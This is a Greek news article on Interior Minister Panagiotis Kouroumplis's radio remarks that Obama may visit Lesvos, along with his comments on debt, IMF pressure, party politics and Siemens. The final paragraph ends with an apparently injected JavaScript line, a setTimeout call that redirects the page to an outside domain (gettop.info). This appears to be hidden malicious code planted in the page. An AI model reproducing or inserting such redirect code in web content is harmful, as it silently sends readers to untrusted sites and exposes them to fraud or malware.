Κουρουμπλής: Ο Ομπάμα θα πάει και στη Λέσβο

0
11

 

Αποκάλυψη έκανε με δηλώσεις του στον ραδιοφωνικό σταθμό Αlpha 989 ο υπουργός Εσωτερικών Παναγιώτης Κουρουμπλής: «Έχω την πληροφορία ότι ο Ομπάμα μπορεί να πάει και στη Λέσβο, γιατί προσδίδει στο προσφυγικό τεράστιο βάρος», τόνισε ο υπουργός και σημείωσε ότι παράλληλα θα συζητηθεί με τον Αμερικανό πρόεδρο και το θέμα του χρέους.

Υπάρχει ένονη φημολογία ότι ο Μπαράκ Ομπάμα θα επισκεφθεί την Ελλάδα και σ αυτό το πλαίσιο θα βρεθεί και στη Λέσβο αλλά και στη ΝΑΤΟϊκή βάση της Σούδας.

Στη ραδιοφωνική του συνέντευξη ο υπουργός εξέφρασε την πεποίθηση ότι «η κυβέρνηση θα κυβερνήσει για 4 χρόνια είτε τους αρέσει είτε όχι» ενώ ανέφερε πως «τα μεγάλα ζητήματα της χώρας είναι το δημόσιο χρέος και το προσφυγικό και νομίζω ότι ο Μητσοτάκης αν είχε το πολιτικό κουράγιο να κάνει την υπέρβασή του, θα είχε πολιτικά κερδίσει. Ποτέ στην πολιτική δεν μπήκε ένα τόσο μεγάλο διακύβευμα της χώρας. Εδώ άνοιξε η κουβέντα. Είναι ζητήματα για τα οποία μπορούν να «ανοίξουν πόρτες» και χρειάζεται ένας δημοκρατικός πατριωτισμός από όλους μας».

«Οι πιέσεις του ΔΝΤ είναι τρομακτικές. Μέχρι τώρα τα προγράμματα που εφαρμόστηκαν στην Ελλάδα δεν απέδωσαν. Η αριστερή κυβέρνηση αναγκάστηκε να πάει σε μεγάλο συμβιβασμό και να υποστεί το κόστος. Η κυβέρνηση θέλει να φανεί χρήσιμη στη χώρα και είμαι βέβαιος γι’ αυτό», ανέφερε ο υπουργός Εσωτερικών.

Για το ενδεχόμενο απομάκρυνσης του Π. Σκουρλέτη είπε: «Συνεργάζομαι καλά με τον Σκουρλέτη και τα υπόλοιπα είναι άλλου παπά ευαγγέλιο» ενώ για το γεγονός ότι έμειναν εκτός Πολιτικού Συμβουλίου η Όλγα Γεροβασίλη και ο Αριστείδης Μπαλτάς σχολίασε πως «δεν είναι η 1η φορά που συμβαίνουν τέτοια ατυχήματα, κάποιος θα έμενε έξω. Και οι δυο είναι άνθρωποι που ο χώρος τους τιμά».

«Ο συμβιβασμός δεν νομίζω ότι έπρεπε να γίνει εις βάρος της Ελλάδας», σχολίασε σχετικά με τη Siemens. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here